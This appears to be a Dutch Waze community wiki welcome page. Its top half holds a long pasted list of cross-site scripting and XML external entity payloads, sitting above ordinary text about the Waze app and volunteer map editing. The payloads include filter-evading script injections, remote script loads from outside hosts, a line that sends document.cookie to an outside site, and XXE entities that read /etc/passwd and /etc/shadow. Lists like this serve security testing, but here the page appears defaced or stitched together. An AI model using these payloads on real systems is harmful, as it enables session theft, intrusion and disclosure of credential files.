<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
 
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
 
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
 
<table BACKGROUND="javascript:document.vulnerable=true;">
 
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
 
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
 
<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
 
<div STYLE="width: expression(document.vulnerable=true);">
 
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
 
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
 
<XSS STYLE="xss:expression(document.vulnerable=true)">
 
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
 
<style TYPE="text/javascript">document.vulnerable=true;</style>
 
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
 
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
 
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
 
<base HREF="javascript:document.vulnerable=true;//">
 
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
 
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
 
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
 
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
 
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
 
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
 
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
 
<a href="javascript#document.vulnerable=true;">
 
<div onmouseover="document.vulnerable=true;">
 
<img src="javascript:document.vulnerable=true;">
 
<img dynsrc="javascript:document.vulnerable=true;">
 
<input type="image" dynsrc="javascript:document.vulnerable=true;">
 
<bgsound src="javascript:document.vulnerable=true;">
 
&<script>document.vulnerable=true;</script>
 
&{document.vulnerable=true;};
 
<img src=&{document.vulnerable=true;};>
 
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
 
<iframe src="vbscript:document.vulnerable=true;">
 
<img src="mocha:document.vulnerable=true;">
 
<img src="livescript:document.vulnerable=true;">
 
<a href="about:<script>document.vulnerable=true;</script>">
 
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
 
<body onload="document.vulnerable=true;">
 
<div style="background-image: url(javascript:document.vulnerable=true;);">
 
<div style="behaviour: url([link to code]);">
 
<div style="binding: url([link to code]);">
 
<div style="width: expression(document.vulnerable=true;);">
 
<style type="text/javascript">document.vulnerable=true;</style>
 
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
 
<style><!--</style><script>document.vulnerable=true;//--></script>
 
<<script>document.vulnerable=true;</script>
 
<![<!--]]<script>document.vulnerable=true;//--></script>
 
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
 
<img src="blah"onmouseover="document.vulnerable=true;">
 
<img src="blah>" onmouseover="document.vulnerable=true;">
 
<xml src="javascript:document.vulnerable=true;">
 
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
 
<div datafld="b" dataformatas="html" datasrc="#X"></div>
 
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
 
<style>@import'http://www.securitycompass.com/xss.css';</style>
 
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
 
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
 
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
 
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
 
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
 
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
 
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
 
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
 
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
 
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
 
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
 
<;/script>;<;script>;alert(1)<;/script>;
 
<;/br style=a:expression(alert())>;
 
<;scrscriptipt>;alert(1)<;/scrscriptipt>;
 
<;br size=\";&;{alert(&#039;XSS&#039;)}\";>;
 
perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out
 
perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out
 
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
 
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
<~/XSS STYLE=xss:expression(alert('XSS'))>
 
"><script>alert('XSS')</script>
 
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
 
</XSS STYLE=xss:expression(alert('XSS'))>
 
>"><script>alert("XSS")</script>&
 
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
 
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
 
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
 
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
 
">
 
>"
 
'';!--"<XSS>=&{()}
 
<IMG SRC="javascript:alert('XSS');">
 
<IMG SRC=javascript:alert('XSS')>
 
<IMG SRC=JaVaScRiPt:alert('XSS')>
 
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
 
<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
 
<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>   
 
<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
 
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
 
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
 
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
 
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
 
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
 
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
 
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
 
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
 
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
 
<script>alert('XSS')</script>
 
%3cscript%3ealert('XSS')%3c/script%3e
 
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
 
<IMG SRC="javascript:alert('XSS');">
 
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
 
<IMG SRC=javascript:alert('XSS')>     
 
<img src=xss onerror=alert(1)>
 
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
 
<IMG SRC="jav ascript:alert('XSS');">
 
<IMG SRC="jav&#x09;ascript:alert('XSS');">
 
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
 
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
 
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 
<BODY BACKGROUND="javascript:alert('XSS')">
 
<BODY ONLOAD=alert('XSS')>
 
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
 
<IMG SRC="javascript:alert('XSS')"
 
<iframe src=http://ha.ckers.org/scriptlet.html <
 
<<SCRIPT>alert("XSS");//<</SCRIPT>
 
%253cscript%253ealert(1)%253c/script%253e
 
"><s"%2b"cript>alert(document.cookie)</script>
 
foo<script>alert(1)</script>
 
<scr<script>ipt>alert(1)</scr</script>ipt>
 
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
 
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 
<marquee onstart='javascript:alert('1');'>=(◕_◕)=
 

Latest revision as of 13:26, 10 June 2020

Other languages:
English • ‎Nederlands

Welkom bij Waze Nederland

Wiki nl.png

Welkom Wazer!

Je bent geïnteresseerd in Waze en vraagt je af wat voor soort app Waze is.
Je gebruikt de app en vraagt je af wat je kunt doen om het te verbeteren.
Je werkt aan de kaart en vraagt je af hoe je een bepaalde situatie het best kunt aanpakken.

Voor algemene informatie kun je de global Wiki pagina's en de Waze home page bezoeken.
Voor informatie over Waze op de ABC-eilanden kun je naar hun Wiki gaan.

Deze Wiki geeft specifieke informatie over Waze in Nederland.

Wat is het

Waze is 's werelds grootste community-based verkeers en navigatie app. Er zijn veel navigatie apps. Veel van deze apps zijn gebaseerd op kaarten die een paar maal per jaar bijgewerkt worden. Dit zorgt voor al snel verouderde kaarten en onjuiste navigatie instructies. Waze is anders. De kaarten van Waze worden haast elke dag vernieuwd. De kaarten worden continu up-to-date gehouden door de vrijwilligers van de Nederlandse Waze gemeenschap. Dus, borden langs de kant van de weg "Navigatie uit" gelden niet voor Waze. Waze heeft de meest recente kaarten, en het is gratis.

De app gebruikt kaart informatie en de GPS van je smartphone. Waze gebruikt waar mogelijk de al op je telefoon aanwezige kaarten van de routes die je eerder gereden hebt. Zo wordt het data gebruik beperkt. Kaarten van nieuwe gebieden en verouderde informatie worden van de Waze servers opgehaald. Wanneer je in de gebieden rijdt waar je onlangs eerder met Waze bent geweest is het mogelijk Waze te gebruiken zonder internet verbinding, maar de beste navigatie ervaring krijg je toch met een internet verbinding. Het data gebruik van de app is gematigd. De test van de ANWB geeft een gebruik van 3,9 MB aan voor een rit van 75 km.

Voor meer informatie over de Waze app kun je de global Wiki page bezoeken.

Wat kan ik doen

Ben je geïnteresseerd in wat jij kan doen voor de Waze gemeenschap?

Onze kaarten zijn erg compleet, maar steden, wegen, het platteland: alles verandert steeds. Jij bent het meest waardevol met jouw locale kennis. Jij kan ons helpen om de Waze kaart up-to-date te houden.

Zijn er wegwerkzaamheden bij jou in de buurt gepland?
Wordt er een nieuwe wijk gebouwd?
Worden er nieuwe wegen aangelegd?
Zijn er wijzigingen in een- / twee-richting verkeer?
Soms missen er nog gegevens of zijn deze niet meer accuraat. Denk aan: maximum snelheid, huisnummers.


Zijn er in jouw buurt bijzondere plaatsen / locaties die voor Wazers interessant kunnen zijn als bestemming zoals een tankstation, parkeerplaats, ziekenhuis, school etcetera. Ga na of ze al op de kaart voorkomen en of de aangegeven informatie nog klopt. (Openingstijden, telefoonnummer, e.d.)

Wanneer je nieuw bent en je wilt ons helpen met het bijwerken van de kaart, lees dan vooral eerst de Quick start guide door en vergeet vervolgens niet de pagina Verbeter je vaardigheden te bekijken. En, wanneer je de kaart aan het bewerken bent: houd de KISS principes voor ogen!

Slack is ons belangrijkste onderlinge communicatie middel. Meld je aan via de Slack invitatie pagina. Wanneer je vragen hebt, aarzel niet ze te stellen. Er zijn hier altijd ervaren editors beschikbaar om je vragen te beantwoorden. Ook het lezen van andermans vragen en antwoorden kan heel leerzaam zijn.

Voor een schematisch overzicht van de mogelijkheden voor beginners zie het Beginners overzicht.

Hoe kan ik het doen

Wanneer je hier bent om een antwoord te vinden op een gedetailleerde vraag en je hebt de Quick start guide al gelezen, kijk dan eens naar de volgende pagina's:

Of gebruik de Index.

Wanneer je het antwoord niet in onze Nederlandse wiki kunt vinden, kun je ook altijd verder zoeken in de global Waze Wiki.

Main Page | Index